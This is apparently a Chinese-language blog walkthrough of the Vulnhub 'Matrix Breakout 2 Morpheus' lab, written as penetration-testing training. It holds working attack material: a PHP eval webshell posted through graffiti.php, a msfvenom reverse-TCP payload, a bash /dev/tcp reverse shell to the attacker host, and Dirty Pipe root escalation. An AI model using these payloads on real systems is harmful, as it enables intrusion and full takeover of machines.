首页 > 其他分享 >Vulnhub靶机笔记2——matrix-breakout-2-morpheus

Vulnhub靶机笔记2——matrix-breakout-2-morpheus

时间:2023-04-30 17:24:33浏览次数:47  
标签:www matrix data 192.168 morpheus exploit breakout linux 124.132

一、介绍

一个以《黑客帝国》为背景的靶场

涉及内容

  • 主机发现
  • 端口服务扫描
  • 1.2不用工具实现
  • ffuf目录爆破
  • 一句话木马
  • 反弹shell msf,蚁剑使用
  • 图片隐写
  • CVE-2022-0847漏洞利用

二、环境

  • 攻击机:kali
  • 靶机:matrix-breakout-2-morpheus

三、过程

1、信息收集

1.1主机存活扫描

nmap扫描

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.124.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 06:50 EDT
Nmap scan report for 192.168.124.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.124.2
Host is up (0.00027s latency).
MAC Address: 00:50:56:E2:53:85 (VMware)
Nmap scan report for 192.168.124.132
Host is up (0.00012s latency).
MAC Address: 00:0C:29:09:6C:9D (VMware)
Nmap scan report for 192.168.124.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:63:42 (VMware)
Nmap scan report for 192.168.124.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 14.06 seconds

发现目标:192.168.124.132

ping命令扫描
编写以下命令扫描
for i in {1..254};do ping -c 1 -w 1 192.168.124.$i|grep from;done

┌──(root㉿kali)-[~]
└─# for i in {1..254};do ping -c 1 -w 1 192.168.124.$i|grep from;done
64 bytes from 192.168.124.2: icmp_seq=1 ttl=128 time=0.155 ms
64 bytes from 192.168.124.129: icmp_seq=1 ttl=64 time=0.026 ms
64 bytes from 192.168.124.132: icmp_seq=1 ttl=64 time=1.21 ms
                                                                  

1.2信息扫描

端口扫描

使用nmap
nmap --min-rate 10000 -p- 192.168.124.132

┌──(root㉿kali)-[~]
└─# nmap --min-rate=10000 -p- 192.168.124.132
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 06:57 EDT
Nmap scan report for 192.168.124.132
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
81/tcp open  hosts2-ns
MAC Address: 00:0C:29:09:6C:9D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds

发现开启22、80、81端口

使用伪设备进行端口扫描
需要先调用bash
for i in {1..80};do (echo < /dev/tcp/192.168.124.132/$i) &>/dev/null && printf "\n[+] The Open Port is:%d\n" "$i" || printf "." ;done

┌──(root㉿kali)-[~]
└─# for i in {1..65535};do (echo < /dev/tcp/192.168.124.132/$i) &>/dev/null && printf "\n[+] The Open Port is:%d\n" "$i" || printf "." ;done
.....................
[+] The Open Port is:22
.........................................................
[+] The Open Port is:80

[+] The Open Port is:81
.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

服务信息扫描

nmap -sV -sT -O -p22,90,81 192.168.124.132

┌──(root㉿kali)-[~]
└─# nmap -sV -sT -O -p22,80,81 192.168.124.132
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 06:59 EDT
Nmap scan report for 192.168.124.132
Host is up (0.00045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
81/tcp open  http    nginx 1.18.0
MAC Address: 00:0C:29:09:6C:9D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.26 seconds
                                                                

发现22为ssh,80为apache,81为nginx

漏洞扫描

nmap --script=vuln -p22,80,81 192.168.124.132

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80,81 192.168.124.132
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 07:01 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.124.132
Host is up (0.00036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /test.php: Test page
|_  /robots.txt: Robots file
81/tcp open  hosts2-ns
MAC Address: 00:0C:29:09:6C:9D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 57.17 seconds

80端口发现两个重要文件test.php和robots.txt

1.3目录爆破

dirsearch -u http://192.168.124.132 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

使用ffuf进行目录爆破

ffuf -u http://192.168.124.132/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

扫描结果

┌──(root㉿kali)-[~]
└─# ffuf -u http://192.168.124.132/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.124.132/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 :: Extensions       : .txt .zip .php html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.php                    [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 5ms]
javascript              [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 1ms]
robots.txt              [Status: 200, Size: 47, Words: 8, Lines: 2, Duration: 2ms]
graffiti.txt            [Status: 200, Size: 147, Words: 25, Lines: 7, Duration: 28ms]
graffiti.php            [Status: 200, Size: 469, Words: 36, Lines: 29, Duration: 57ms]
.php                    [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 12ms]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 8ms]
:: Progress: [1102735/1102735] :: Job [1/1] :: 6055 req/sec :: Duration: [0:02:13] :: Errors: 0 ::

发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件

2、网站预览

首页

访问robot.txt
There's no white rabbit here. Keep searching!就一个这玩意
访问graffiti.php

发现可以输入的东西可以写入graffiti.txt

访问graffiti.txt

3、获得shell

以下可以有好几种方法

方案一

01一句话木马

抓取post包

POST /graffiti.php HTTP/1.1

Host: 192.168.124.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

Origin: http://192.168.124.132

Connection: close

Referer: http://192.168.124.132/graffiti.php

Upgrade-Insecure-Requests: 1


//message=cmd&file=graffiti.txt//原始内容
message=<?php eval($_POST['CMD']);?>&file=test.php

用蚁剑连一下就行了

02msf马+提权

生成msf马

 ┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.124.129 lport=4444 -f elf -o shell.elf                                                 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf

利用蚁剑上传到靶机,加权

建立监听

msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 192.168.124.132
lhost => 192.168.124.132
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.124.132  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[-] Handler failed to bind to 192.168.124.132:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (989032 bytes) to 192.168.124.132
[*] Meterpreter session 1 opened (192.168.124.129:4444 -> 192.168.124.132:36648 ) at 2023-04-27 08:39:26 -0400

meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > 


使用提权模块post/multi/recon/local_exploit_suggester

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                 Connection
  --  ----  ----                   -----------                 ----------
  1         meterpreter x86/linux  www-data @ 192.168.124.132  192.168.124.129:4444 -> 192.168.124.132:36648  (192.168.124.132)

msf6 exploit(multi/handler) > search suggeste

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/server/icmp_exfil                                       normal  No     ICMP Exfiltration Service
   1  exploit/windows/browser/ms10_018_ie_behaviors    2010-03-09       good    No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   2  post/multi/recon/local_exploit_suggester                          normal  No     Multi Recon Local Exploit Suggester
   3  exploit/windows/smb/timbuktu_plughntcommand_bof  2009-06-25       great   No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/smb/timbuktu_plughntcommand_bof

msf6 exploit(multi/handler) > use 2
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.124.132 - Collecting local exploits for x86/linux...
[*] 192.168.124.132 - 40 exploit checks are being tried...
[+] 192.168.124.132 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.10.0
[+] 192.168.124.132 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 

发现存在CVE-2022-0847漏洞

//查询并使用漏洞
msf6 post(multi/recon/local_exploit_suggester) > search 2022_0847

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/local/cve_2022_0847_dirtypipe  2022-02-20       excellent  Yes    Dirty Pipe Local Privilege Escalation via CVE-2022-0847


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/cve_2022_0847_dirtypipe

msf6 post(multi/recon/local_exploit_suggester) > use 0
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > options

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

//监听端口换成5555,避免冲突
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lport 5555
lport => 5555
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 192.168.124.129
lhost => 192.168.124.129
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[-] Msf::OptionValidateError The following options failed to validate: SESSION
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > options

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.124.129  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 192.168.124.129:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.vtpstmsxw /bin/passwd'
[*] Sending stage (3020772 bytes) to 192.168.124.132
[+] Deleted /tmp/.vtpstmsxw
[*] Meterpreter session 2 opened (192.168.124.129:5555 -> 192.168.124.132:56896 ) at 2023-04-27 08:49:48 -0400

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: root

提权成功,这种方法虽然快,但是显得太简单

方案二

03反弹shell并建立监听

使用nc建立监听nc -lnvp 4444

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444                                
listening on [any] 4444 ...
connect to [192.168.124.129] from (UNKNOWN) [192.168.124.132] 36940
bash: cannot set terminal process group (910): Inappropriate ioctl for device
bash: no job control in this shell
www-data@morpheus:/var/www/html$ 

使用php反弹shell<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.124.129/4444 0>&1'"); ?>并进行url关键字编码

数据包修改

POST /graffiti.php HTTP/1.1

Host: 192.168.124.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 111

Origin: http://192.168.124.132

Connection: close

Referer: http://192.168.124.132/graffiti.php

Upgrade-Insecure-Requests: 1



message=<%3fphp+exec("/bin/bash+-c+'bash+-i+>%26+/dev/tcp/192.168.124.129/4444+0>%261'")%3b+%3f>&file=shell.php

04漏洞检测并提权

上传漏洞扫描脚本
PEASS-ng脚本
PEASS-ng这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描
上传

┌──(root㉿kali)-[~/…/update/PEASS-ng/linPEAS/builder]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.124.132 - - [27/Apr/2023 09:24:01] "GET /linpeas_base.sh HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

下载加权使用,奇怪的是今天用这个脚本没扫描出来漏洞

www-data@morpheus:/var/www/html$ wget http://192.168.124.129:8000/linpeas_base.sh
www-data@morpheus:chmod +x linpeas_base.sh
www-data@morpheus:./linpease_base.sh

linux-exploit-suggester脚本
上传加权与上面类似,不做重复演示
执行结果

+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

检测到一个cve-2022-0847漏洞

使用CVE-2022-0847 DirtyPipe漏洞
使用这一个脚本github

www-data@morpheus:/var/www/html$ ./Dirty-Pipe.sh
./Dirty-Pipe.sh
/etc/passwd已备份到/tmp/passwd
It worked!
# 恢复原来的密码
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
whoami 
root

提高交互性

python3 -c "import pty;pty.spawn('/bin/bash')"
root@morpheus:/var/www/html# ls
ls
Dirty-Pipe.sh  graffiti.txt       linux-exploit-suggester.sh  test02.elf
compile.sh     index.html         robots.txt                  trinity.jpeg
exp            index.html.1       shell.elf
exp.c          linpeas_base.sh    shell.php
graffiti.php   linpeas_base02.sh  test.php
root@morpheus:/var/www/html# whoami
whoami
root
root@morpheus:/var/www/html# 

发现还存在两个用户

root@morpheus:/var/www/html# cd /home   
cd /home
root@morpheus:/home# ls
ls
cypher  trinity
root@morpheus:/home# 

4、获得flag

在根目录发现一个FALG.txt文件,打开如下

root@morpheus:/# cat FLAG.txt
cat FLAG.txt
Flag 1!

You've gotten onto the system.  Now why has Cypher locked everyone out of it?

Can you find a way to get Cypher's password? It seems like he gave it to 
Agent Smith, so Smith could figure out where to meet him.

Also, pull this image from the webserver on port 80 to get a flag.

/.cypher-neo.png

提示存在一个隐藏文件在html目录下

root@morpheus:/var/www/html# ls -alh
ls -alh
total 800K
drwxr-xr-x 2 www-data www-data 4.0K Apr 30 08:34 .
drwxr-xr-x 3 root     root     4.0K Oct 28  2021 ..
-rw-r--r-- 1 www-data www-data 373K Oct 28  2021 .cypher-neo.png
-rwxr-xr-x 1 www-data www-data 4.8K Apr 30 08:33 Dirty-Pipe.sh
-rw-r--r-- 1 www-data www-data   79 Apr 30 08:01 cmd.php
-rwxr-xr-x 1 www-data www-data  18K Apr 30 08:34 exp
-rw-r--r-- 1 www-data www-data 4.3K Apr 30 08:34 exp.c
-rw-r--r-- 1 www-data www-data  770 Oct 28  2021 graffiti.php
-rw-r--r-- 1 www-data www-data  143 Apr 30 07:59 graffiti.txt
-rw-r--r-- 1 www-data www-data  348 Oct 28  2021 index.html
-rwxr-xr-x 1 www-data www-data 315K Apr 30 08:05 linpeas_base.sh
-rw-r--r-- 1 www-data www-data   47 Oct 28  2021 robots.txt
-rw-r--r-- 1 www-data www-data  44K Oct 28  2021 trinity.jpeg

下载下来保存为neo.png

检查文件

┌──(root㉿kali)-[~/tools/images]
└─# binwalk neo.png                         

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 853 x 480, 8-bit/color RGBA, non-interlaced
138           0x8A            Zlib compressed data, best compression

发现存在一个捆绑文件

┌──(root㉿kali)-[~/tools/images/_neo.png.extracted]
└─# binwalk -e neo.png --run-as=root
┌──(root㉿kali)-[~/tools/images]
└─# ls
neo.png  _neo.png.extracted
                                                                                                                                                       
┌──(root㉿kali)-[~/tools/images]
└─# cd _neo.png.extracted        
                                                                                                                                                       
┌──(root㉿kali)-[~/tools/images/_neo.png.extracted]
└─# ls
8A  8A.zlib

存在隐写,使用winhxd查看

末尾为AE 42 60 82大概率是个png文件,到这就不会了

四、一些问题

引用资料
红队笔记https://www.bilibili.com/video/BV1dg411b74a/?spm_id_from=333.999.0.0

标签:www,matrix,data,192.168,morpheus,exploit,breakout,linux,124.132
From: https://www.cnblogs.com/koka/p/17365446.html

相关文章

  • 张量(Tensor)、标量(scalar)、向量(vector)、矩阵(matrix)
    张量(Tensor):Tensor=multi-dimensionalarrayofnumbers张量是一个多维数组,它是标量,向量,矩阵的高维扩展,是一个数据容器,张量是矩阵向任意维度的推广注意,张量的维度(dimension)通常叫作轴(axis),张量轴的个数也叫作阶(rank)]标量(scalar):只有一个数字的张量叫标量(也叫标量张量、零维......
  • Educational Codeforces Round 48 (Rated for Div. 2) D. Vasya And The Matrix
    NowVasyaistakinganexaminmathematics.Inordertogetagoodmark,Vasyaneedstoguessthematrixthattheteacherhasconstructed!Vasyaknowsthatthematrixconsistsofnrowsandmcolumns.Foreachrow,heknowsthexor(bitwiseexcludingor)......
  • B - Coloring Matrix
    B-ColoringMatrixhttps://atcoder.jp/contests/abc298/tasks/abc298_b 思路判断A矩阵是否满足条件,不符合,对A矩阵逆时针旋转,旋转后对A矩阵继续判断,直到满足条件,或者A矩阵复位。 Code#include<iomanip>#include<bits/stdc++.h>#include<iostream>usingnamesp......
  • HDU 4313 Matrix (贪心)
    题目地址:HDU4313利用最小生成树的思想,这里是从大往下删,能删则删,不能删就留着。用个并查集维护下。代码如下:#include<iostream>#include<string.h>#include<math.h>#include<queue>#include<algorithm>#include<stdlib.h>#include<map>#include<set>......
  • R语言中的matrix(矩阵),list(列表),data.frame(数据框)总结
    一、R语言中的矩阵matrix是一个二维的数组array,因此数组array的一些操作它也适用。①它与array相比,特有的是矩阵的一些运算,例如:求维度:dim(A)转置:t(A)求行列式:det(A)矩阵相乘:x%*%y对角运算:diag(A)求逆:solve(A,b)求特征值和特征向量:eigen(A)奇异值分解:svd(A)②在多维数组中,apply函数......
  • 【spring学习笔记】(二)Spring MVC注解配置 参数转换注解@RequestMapping@RequestParam
    @TOC介绍在SpringMVC项目中,<\context:component-scan>配置标签还会开启@Request-Mapping、@GetMapping等映射注解功能(也就是会注册RequestMappingHandler-Mapping和RequestMappingHandlerAdapter等请求映射和处理等组件),但是<context:component-scan>不支持数据转换或验证等注解功......
  • Vulnhub之Matrix Breakout 2 Morpheus靶机详细测试过程
    MatrixBreakout:2Morpheus靶机信息名称:Matrix-Breakout:2Morpheus地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/虽然作者提示该靶机最好是在VirtualBox部署,但是经过测试,本靶机在VirtualBox无法启动,更适合导入到Vmware中。识别目标主机IP地址(ka......
  • c++实现Matlab矩阵Matrix类(实矩阵Matrix、复矩阵CMatrix)
    全栈工程师开发手册(作者:栾鹏)matlab2c动态链接库下载matlab库函数大全matlab2c基础教程matlab2c开发全解教程开发注意事项:1、目前matlab2c对矩阵的实现仅包含实数型、复数型数据。实数型矩阵使用Matrix定义,复数型矩阵使用CMatrix定义。2、实数矩阵元素int、float元素类型会自动......
  • WebMatrix3 启动报KeyNotFoundException错误解决方法
    我上网下载了WebMatrix3、iisexpress8安装以后运行WebMatrix3报错,日志如下:System.Collections.Generic.KeyNotFoundException:要使用的命令不在有效命令列表中。Thecommandbeingusedisnotinthelistofvalidcommands.应用程序:WebMatrix.exeFramework版本:v4.0.3......
  • [Algorithm] Dynamic programming - 01 - Drawing 2-d matrix
    Problem:LevenshteinDistanceWriteafunctionthattakesintwostringsandreturnstheminimumnumberofeditoperationsthatneedtobeperformedonthefir......